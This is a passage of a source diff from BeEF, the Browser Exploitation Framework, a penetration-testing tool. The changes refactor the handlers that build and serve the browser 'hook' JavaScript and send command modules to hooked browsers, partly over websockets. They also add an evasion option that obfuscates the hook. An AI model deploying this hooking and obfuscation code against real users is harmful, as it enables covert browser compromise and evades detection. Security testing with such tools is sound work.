-        BeEF::API::Registrar.instance.fire(BeEF::API::Server::Hook, 'pre_hook_send', hooked_browser, @body, @params, @request, @response)
+        BeEF::API::Registrar.instance.fire(BeEF::API::Server::Hook, 'pre_hook_send', hooked_browser, @body, @params, request, response)
      end

      # @note set response headers and body
-      @response = Rack::Response.new(
-            body = [@body],
-            status = 200,
-            header = {
-              'Pragma' => 'no-cache',
+     headers  'Pragma' => 'no-cache',
              'Cache-Control' => 'no-cache',
              'Expires' => '0',
              'Content-Type' => 'text/javascript',
              'Access-Control-Allow-Origin' => '*',
              'Access-Control-Allow-Methods' => 'POST, GET'
-            }
-        )
-      
+      @body
    end
-
-    private
-    
-    # @note Object representing the HTTP request
-    @request
-    
-    # @note Object representing the HTTP response
-    @response
-    
-    # @note A string containing the list of BeEF components active in the hooked browser
-    # @todo Confirm this variable is still used
-    @beef_js_cmps
-    
  end
  
 end
--- a/core/main/handlers/modules/beefjs.rb
+++ b/core/main/handlers/modules/beefjs.rb
@@ -1,106 +1,154 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
-module Core
-module Handlers
-module Modules
-  
-  # @note Purpose: avoid rewriting several times the same code.
-  module BeEFJS
-    
-    # Builds the default beefjs library (all default components of the library).
-    # @param [Object] req_host The request object
-    def build_beefjs!(req_host)
+  module Core
+    module Handlers
+      module Modules

-      # @note set up values required to construct beefjs
-      beefjs = '' 
-      # @note location of sub files      
-      beefjs_path = "#{$root_dir}/core/main/client/"
-      js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js)
+        # @note Purpose: avoid rewriting several times the same code.
+        module BeEFJS

-      # @note construct the beefjs string from file(s)
-      js_sub_files.each {|js_sub_file_name|
-        js_sub_file_abs_path = beefjs_path + js_sub_file_name 
-        beefjs << (File.read(js_sub_file_abs_path) + "\n\n") 
-      }
-      
-      # @note create the config for the hooked browser session
-      config = BeEF::Core::Configuration.instance
-      hook_session_name = config.get('beef.http.hook_session_name')
-      hook_session_config = BeEF::Core::Server.instance.to_h
+          # Builds the default beefjs library (all default components of the library).
+          # @param [Object] req_host The request object
+          def build_beefjs!(req_host)
+            config = BeEF::Core::Configuration.instance
+            # @note set up values required to construct beefjs
+            beef_js = ''
+            # @note location of sub files
+            beef_js_path = "#{$root_dir}/core/main/client/"

-      # @note if http_host="0.0.0.0" in config ini, use the host requested by client
-      if hook_session_config['beef_host'].eql? "0.0.0.0" 
-        hook_session_config['beef_host'] = req_host 
-        hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host)  
-      end
-      
-      # @note populate place holders in the beefjs string and set the response body
-      eruby = Erubis::FastEruby.new(beefjs)
-      @body << eruby.evaluate(hook_session_config)
-  
-    end
-    
-    # Finds the path to js components
-    # @param [String] component Name of component
-    # @return [String|Boolean] Returns false if path was not found, otherwise returns component path
-    def find_beefjs_component_path(component)
-      component_path = component
-      component_path.gsub!(/beef./, '')
-      component_path.gsub!(/\./, '/')
-      component_path.replace "#{$root_dir}/core/main/client/#{component_path}.js"
-      
-      return false if not File.exists? component_path
-      
-      component_path
-    end
-    
-    # Builds missing beefjs components.
-    # @param [Array] beefjs_components An array of component names
-    def build_missing_beefjs_components(beefjs_components)
-      # @note verifies that @beef_js_cmps is not nil to avoid bugs
-      @beef_js_cmps = '' if @beef_js_cmps.nil?
-      
-      if beefjs_components.is_a? String
-        beefjs_components_path = find_beefjs_component_path(beefjs_components)
-        raise "Invalid component: could not build the beefjs file" if not beefjs_components_path
-        beefjs_components = {beefjs_components => beefjs_components_path} 
-      end
+            # @note External libraries (like jQuery) that are not evaluated with Eruby and possibly not obfuscated
+            ext_js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js)

-      beefjs_components.keys.each {|k|
-        next if @beef_js_cmps.include? beefjs_components[k]
-        
-        # @note path to the component
-        component_path = beefjs_components[k]
-        
-        # @note we output the component to the hooked browser
-        @body << File.read(component_path)+"\n\n"
-        
-        # @note finally we add the component to the list of components already generated so it does not get generated numerous times.
-        if @beef_js_cmps.eql? ''
-          @beef_js_cmps = component_path
-        else
-          @beef_js_cmps += ",#{component_path}"
+            # @note Load websocket library only if WS server is enabled in config.yaml
+            if config.get("beef.http.websocket.enable") == false
+              # @note BeEF libraries: need Eruby evaluation and obfuscation                                                                                                                           #antisnatchor: leave timeout.js as the last one!
+              beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js are.js timeout.js)
+            else                                                                                                                                                                                                   #antisnatchor: leave timeout.js as the last one!
+              beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js websocket.js are.js timeout.js)
+            end
+
+            ext_js_to_obfuscate = ''
+            ext_js_to_not_obfuscate = ''
+
+            # @note If Evasion is enabled, the final ext_js string will be ext_js_to_obfuscate + ext_js_to_not_obfuscate
+            # @note If Evasion is disabled, the final ext_js will be just ext_js_to_not_obfuscate
+            ext_js_sub_files.each{ |ext_js_sub_file|
+              if config.get("beef.extension.evasion.enable")
+                if config.get("beef.extension.evasion.exclude_core_js").include?(ext_js_sub_file)
+                  print_debug "Excluding #{ext_js_sub_file} from core files obfuscation list"
+                  # do not obfuscate the file
+                  ext_js_sub_file_path = beef_js_path + ext_js_sub_file
+                  ext_js_to_not_obfuscate << (File.read(ext_js_sub_file_path) + "\n\n")
+                else
+                  ext_js_sub_file_path = beef_js_path + ext_js_sub_file
+                  ext_js_to_obfuscate << (File.read(ext_js_sub_file_path) + "\n\n")
+                end
+              else
+                # Evasion is not enabled, do not obfuscate anything
+                ext_js_sub_file_path = beef_js_path + ext_js_sub_file
+                ext_js_to_not_obfuscate << (File.read(ext_js_sub_file_path) + "\n\n")
+              end
+            }
+
+            # @note construct the beef_js string from file(s)
+            beef_js_sub_files.each { |beef_js_sub_file|
+              beef_js_sub_file_path = beef_js_path + beef_js_sub_file
+              beef_js << (File.read(beef_js_sub_file_path) + "\n\n")
+            }
+
+            # @note create the config for the hooked browser session
+            hook_session_config = BeEF::Core::Server.instance.to_h
+
+            # @note if http_host="0.0.0.0" in config ini, use the host requested by client
+            if hook_session_config['beef_host'].eql? "0.0.0.0"
+              hook_session_config['beef_host'] = req_host
+              hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host)
+            end
+
+            # @note if http_port <> public_port in config ini, use the public_port
+            unless hook_session_config['beef_public_port'].nil?
+              if hook_session_config['beef_port'] != hook_session_config['beef_public_port']
+                hook_session_config['beef_port'] = hook_session_config['beef_public_port']
+                hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_port']}/, hook_session_config['beef_public_port'])
+                if hook_session_config['beef_public_port'] == '443'
+                  hook_session_config['beef_url'].sub!(/http:/, 'https:')
+                end
+              end
+            end
+
+            # @note Set some WebSocket properties
+            if config.get("beef.http.websocket.enable")
+              hook_session_config['websocket_secure'] = config.get("beef.http.websocket.secure")
+              hook_session_config['websocket_port'] = config.get("beef.http.websocket.port")
+              hook_session_config['websocket_timer'] = config.get("beef.http.websocket.alive_timer")
+              hook_session_config['websocket_sec_port']= config.get("beef.http.websocket.secure_port")
+            end
+
+            # @note populate place holders in the beef_js string and set the response body
+            eruby = Erubis::FastEruby.new(beef_js)
+            @hook = eruby.evaluate(hook_session_config)
+
+            if config.get("beef.extension.evasion.enable")
+              evasion = BeEF::Extension::Evasion::Evasion.instance
+              @final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate + @hook) 
+            else
+              @final_hook = ext_js_to_not_obfuscate + @hook
+            end
+
+            # @note Return the final hook to be sent to the browser
+            @body << @final_hook
+
+          end
+
+          # Finds the path to js components
+          # @param [String] component Name of component
+          # @return [String|Boolean] Returns false if path was not found, otherwise returns component path
+          def find_beefjs_component_path(component)
+            component_path = component
+            component_path.gsub!(/beef./, '')
+            component_path.gsub!(/\./, '/')
+            component_path.replace "#{$root_dir}/core/main/client/#{component_path}.js"
+
+            return false if not File.exists? component_path
+
+            component_path
+          end
+
+          # Builds missing beefjs components.
+          # @param [Array] beefjs_components An array of component names
+          def build_missing_beefjs_components(beefjs_components)
+            # @note verifies that @beef_js_cmps is not nil to avoid bugs
+            @beef_js_cmps = '' if @beef_js_cmps.nil?
+
+            if beefjs_components.is_a? String
+              beefjs_components_path = find_beefjs_component_path(beefjs_components)
+              raise "Invalid component: could not build the beefjs file" if not beefjs_components_path
+              beefjs_components = {beefjs_components => beefjs_components_path}
+            end
+
+            beefjs_components.keys.each { |k|
+              next if @beef_js_cmps.include? beefjs_components[k]
+
+              # @note path to the component
+              component_path = beefjs_components[k]
+
+              # @note we output the component to the hooked browser
+              @body << File.read(component_path)+"\n\n"
+
+              # @note finally we add the component to the list of components already generated so it does not get generated numerous times.
+              if @beef_js_cmps.eql? ''
+                @beef_js_cmps = component_path
+              else
+                @beef_js_cmps += ",#{component_path}"
+              end
+            }
+          end
        end
-      }
+      end
    end
-
  end
-  
-end
-end
-end
 end
--- a/core/main/handlers/modules/command.rb
+++ b/core/main/handlers/modules/command.rb
@@ -1,70 +1,80 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
-module Core
-module Handlers
-module Modules
+  module Core
+    module Handlers
+      module Modules

-  module Command
+        module Command

-    # Adds the command module instructions to a hooked browser's http response. 
-    # @param [Object] command Command object
-    # @param [Object] hooked_browser Hooked Browser object
-    def add_command_instructions(command, hooked_browser)
+          # Adds the command module instructions to a hooked browser's http response.
+          # @param [Object] command Command object
+          # @param [Object] hooked_browser Hooked Browser object
+          def add_command_instructions(command, hooked_browser)
+            (print_error "hooked_browser is nil"; return) if hooked_browser.nil?
+            (print_error "hooked_browser.session is nil"; return) if hooked_browser.session.nil?
+            (print_error "hooked_browser is nil"; return) if command.nil?
+            (print_error "hooked_browser.command_module_id is nil"; return) if command.command_module_id.nil?

-      (print_error "hooked_browser is nil";return) if hooked_browser.nil?
-      (print_error "hooked_browser.session is nil";return) if hooked_browser.session.nil?
-      (print_error "hooked_browser is nil";return) if command.nil?
-      (print_error "hooked_browser.command_module_id is nil";return) if command.command_module_id.nil?
+            config = BeEF::Core::Configuration.instance
+            # @note get the command module
+            command_module = BeEF::Core::Models::CommandModule.first(:id => command.command_module_id)
+            (print_error "command_module is nil"; return) if command_module.nil?
+            (print_error "command_module.path is nil"; return) if command_module.path.nil?

-      # @note get the command module
-      command_module = BeEF::Core::Models::CommandModule.first(:id => command.command_module_id)      
-      (print_error "command_module is nil";return) if command_module.nil?
-      (print_error "command_module.path is nil";return) if command_module.path.nil?
+            if (command_module.path.match(/^Dynamic/))
+              command_module = BeEF::Modules::Commands.const_get(command_module.path.split('/').last.capitalize).new
+            else
+              key = BeEF::Module.get_key_by_database_id(command.command_module_id)
+              command_module = BeEF::Core::Command.const_get(config.get("beef.module.#{key}.class")).new(key)
+            end
+
+            command_module.command_id = command.id
+            command_module.session_id = hooked_browser.session
+            command_module.build_datastore(command.data)
+            command_module.pre_send
+
+            build_missing_beefjs_components(command_module.beefjs_components) if not command_module.beefjs_components.empty?
+
+            ws = BeEF::Core::Websocket::Websocket.instance
+
+            if config.get("beef.extension.evasion.enable")
+              evasion = BeEF::Extension::Evasion::Evasion.instance
+              @output = evasion.obfuscate(command_module.output)
+            else
+              @output = command_module.output
+            end
+
+            #todo antisnatchor: remove this gsub crap adding some hook packing.
+            if config.get("beef.http.websocket.enable") && ws.getsocket(hooked_browser.session)
+              #content = command_module.output.gsub('//
+              #//
+              #//   Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+              #//   Browser Exploitation Framework (BeEF) - http://beefproject.com
+              #//   See the file 'doc/COPYING' for copying permission
+              #//
+              #//', "")
+              ws.send(@output, hooked_browser.session)
+            else
+              @body << @output + "\n\n"
+            end
+            # @note prints the event to the console
+            if BeEF::Settings.console?
+              name = command_module.friendlyname || kclass
+              print_info "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has been sent instructions from command module [id:#{command.id}, name:'#{name}']"
+            end
+
+            # @note flag that the command has been sent to the hooked browser
+            command.instructions_sent = true
+            command.save
+          end
+
+        end

-      if(command_module.path.match(/^Dynamic/))
-         command_module = BeEF::Modules::Commands.const_get(command_module.path.split('/').last.capitalize).new
-      else
-         key = BeEF::Module.get_key_by_database_id(command.command_module_id) 
-         command_module = BeEF::Core::Command.const_get(BeEF::Core::Configuration.instance.get("beef.module.#{key}.class")).new(key)
      end
-
-      command_module.command_id = command.id
-      command_module.session_id = hooked_browser.session
-      command_module.build_datastore(command.data)
-      command_module.pre_send
-
-      build_missing_beefjs_components(command_module.beefjs_components) if not command_module.beefjs_components.empty?
-
-      @body << command_module.output + "\n\n"
-      
-      # @note prints the event to the console
-      if BeEF::Settings.console?
-      name = command_module.friendlyname || kclass
-      print_info "Hooked browser #{hooked_browser.ip} has been sent instructions from command module '#{name}'"
-      end
-
-      # @note flag that the command has been sent to the hooked browser
-      command.instructions_sent = true 
-      command.save
    end
-
  end
-
-end
-end
-end
 end
--- a/core/main/logger.rb
+++ b/core/main/logger.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #

 module BeEF
@@ -24,6 +14,10 @@ module Core
    # Constructor
    def initialize
      @logs = BeEF::Core::Models::Log
+      @config = BeEF::Core::Configuration.instance
+
+      # if notifications are enabled create a new instance
+      @notifications = BeEF::Extension::Notifications::Notifications unless @config.get('beef.extension.notifications.enable') == false
    end
  
    # Registers a new event in the logs
@@ -34,6 +28,9 @@ module Core
    def register(from, event, hb = 0)
      # type conversion to enforce standards
      hb = hb.to_i
+
+      # get time now
+      time_now = Time.now
      
      # arguments type checking
      raise Exception::TypeError, '"from" needs to be a string' if not from.string?
@@ -41,7 +38,12 @@ module Core
      raise Exception::TypeError, '"Hooked Browser ID" needs to be an integer' if not hb.integer?
      
      # logging the new event into the database
-      @logs.new(:type => "#{from}", :event => "#{event}", :date => Time.now, :hooked_browser_id => hb).save
+      @logs.new(:type => "#{from}", :event => "#{event}", :date => time_now, :hooked_browser_id => hb).save
+
+      # if notifications are enabled send the info there too
+      if @notifications
+        @notifications.new(from, event, time_now, hb)
+      end
      
      # return
      true
--- a/core/main/migration.rb
+++ b/core/main/migration.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #

 module BeEF
--- a/extensions/initialization/models/browserdetails.rb
+++ b/extensions/initialization/models/browserdetails.rb
@@ -1,21 +1,10 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
-module Extension
-module Initialization
+module Core
 module Models
  #
  # Table stores the details of browsers.
@@ -26,16 +15,7 @@ module Models
  
    include DataMapper::Resource
    
-    storage_names[:default] = 'extension_initialization_browserdetails'
-    
-
-    #
-    # Class constructor
-    #
-    def initialize(config)
-      super(config)
-    end
-  
+    storage_names[:default] = 'core_browserdetails'
    property :session_id, String, :length => 255, :key => true
    property :detail_key, String, :length => 255, :lazy => false, :key => true
    property :detail_value, Text, :lazy => false  
@@ -59,7 +39,7 @@ module Models
      return nil if not get(session_id, detail_key).nil?
    
      # store the returned browser details
-      browserdetails = BeEF::Extension::Initialization::Models::BrowserDetails.new(
+      browserdetails = BeEF::Core::Models::BrowserDetails.new(
              :session_id => session_id,
              :detail_key => detail_key,
              :detail_value => detail_value)
@@ -72,7 +52,7 @@ module Models
    
      browserdetails
    end
-  
+ 
    #
    # Returns the icon representing the browser type the
    # hooked browser is using (i.e. Firefox, Internet Explorer)
@@ -104,9 +84,10 @@ module Models
      return BeEF::Core::Constants::Os::OS_QNX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_QNX_UA_STR
      return BeEF::Core::Constants::Os::OS_BEOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BEOS_UA_STR
      return BeEF::Core::Constants::Os::OS_OPENBSD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_OPENBSD_UA_STR
-      return BeEF::Core::Constants::Os::OS_IPHONE_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPHONE_UA_STR
-      return BeEF::Core::Constants::Os::OS_IPAD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPAD_UA_STR
-      return BeEF::Core::Constants::Os::OS_IPOD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPOD_UA_STR
+      return BeEF::Core::Constants::Os::OS_WEBOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_WEBOS_UA_STR
+      return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPHONE_UA_STR
+      return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPAD_UA_STR
+      return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPOD_UA_STR
      return BeEF::Core::Constants::Os::OS_MAEMO_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAEMO_UA_STR
      return BeEF::Core::Constants::Os::OS_MAC_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAC_UA_STR
      return BeEF::Core::Constants::Os::OS_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BLACKBERRY_UA_STR
@@ -115,9 +96,35 @@ module Models
      BeEF::Core::Constants::Os::OS_UNKNOWN_IMG
    end
  
+    #
+    # Returns the icon representing the hardware the
+    # zombie is running on (i.e. iPhone, BlackBerry)
+    #
+    def self.hw_icon(session_id)
+
+      ua_string = get(session_id, 'BrowserReportedName')
+
+      return BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG if ua_string.nil?
+
+      return BeEF::Core::Constants::Hardware::HW_WINPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_WINPHONE_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_ZUNE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_ZUNE_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_BLACKBERRY_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_IPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPHONE_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_IPAD_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPAD_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_IPOD_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPOD_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_KINDLE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_KINDLE_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_NOKIA_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_NOKIA_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_MOTOROLA_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_MOTOROLA_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_HTC_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_HTC_UA_STR
+      return BeEF::Core::Constants::Hardware::HW_GOOGLE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_GOOGLE_UA_STR
+	return BeEF::Core::Constants::Hardware::HW_ERICSSON_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_ERICSSON_UA_STR
+
+      BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG
+
+    end
+
  end

 end
 end
 end
-end
--- a/core/main/models/command.rb
+++ b/core/main/models/command.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #

 module BeEF
@@ -65,11 +55,11 @@ module Models
      command.save

      # @note log that the result was returned
-      BeEF::Core::Logger.instance.register('Command', "Hooked browser #{hooked_browser.ip} has executed instructions from command module '#{command_friendly_name}'", hooked_browser_id)
+      BeEF::Core::Logger.instance.register('Command', "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has executed instructions from command module [id:#{command_id}, name:'#{command_friendly_name}']", hooked_browser_id)

      # @note prints the event into the console
      if BeEF::Settings.console?
-        print_info "Hooked browser #{hooked_browser.ip} has executed instructions from command module '#{command_friendly_name}'"
+        print_info "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has executed instructions from command module [id:#{command_id}, name:'#{command_friendly_name}']"
      end
    end

--- a/core/main/models/commandmodule.rb
+++ b/core/main/models/commandmodule.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
@@ -28,8 +18,6 @@ module Models
    property :path, Text, :lazy => false
  
    has n, :commands
-    has 1, :dynamic_command_info
-  
  end
  
 end
--- a/core/main/models/dynamiccommandinfo.rb
+++ b/core/main/models/dynamiccommandinfo.rb
@@ -1,36 +0,0 @@
-#
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
-#
-module BeEF
-module Core
-module Models
-
-  class DynamicCommandInfo
-  
-    include DataMapper::Resource
-  
-    storage_names[:default] = 'core_dynamiccommandinfo'
-  
-  	property :id, Serial
-    property :name, Text, :lazy => false
-    property :description, Text, :lazy => false
-  	property :targets, Text, :lazy => false
-  	belongs_to :command_module
-  
-  end
-
-end
-end
-end
--- a/core/main/models/dynamicpayloadinfo.rb
+++ b/core/main/models/dynamicpayloadinfo.rb
@@ -1,38 +0,0 @@
-#
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
-#
-module BeEF
-module Core
-module Models
-
-  class DynamicPayloadInfo
-  
-    include DataMapper::Resource
-  
-    storage_names[:default] = 'core_dynamicpayloadinfo'
-  
-    property :id, Serial
-    property :name, String, :length => 30
-    property :value, String, :length => 255
-    property :required, Boolean, :default => false
-    property :description, Text, :lazy => false
-  
-    belongs_to :dynamic_payloads
-  
-  end
-
-end
-end
-end
--- a/core/main/models/dynamicpayloads.rb
+++ b/core/main/models/dynamicpayloads.rb
@@ -1,35 +0,0 @@
-#
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
-#
-module BeEF
-module Core
-module Models
-
-  class DynamicPayloads
-  
-    include DataMapper::Resource
-  
-    storage_names[:default] = 'core_dynamicpayloads'
-  
-    property :id, Serial
-    property :name, Text, :lazy => false
-  
-  	has n, :dynamic_payload_info
-  
-  end
-
-end
-end
-end
--- a/core/main/models/hookedbrowser.rb
+++ b/core/main/models/hookedbrowser.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
--- a/core/main/models/log.rb
+++ b/core/main/models/log.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
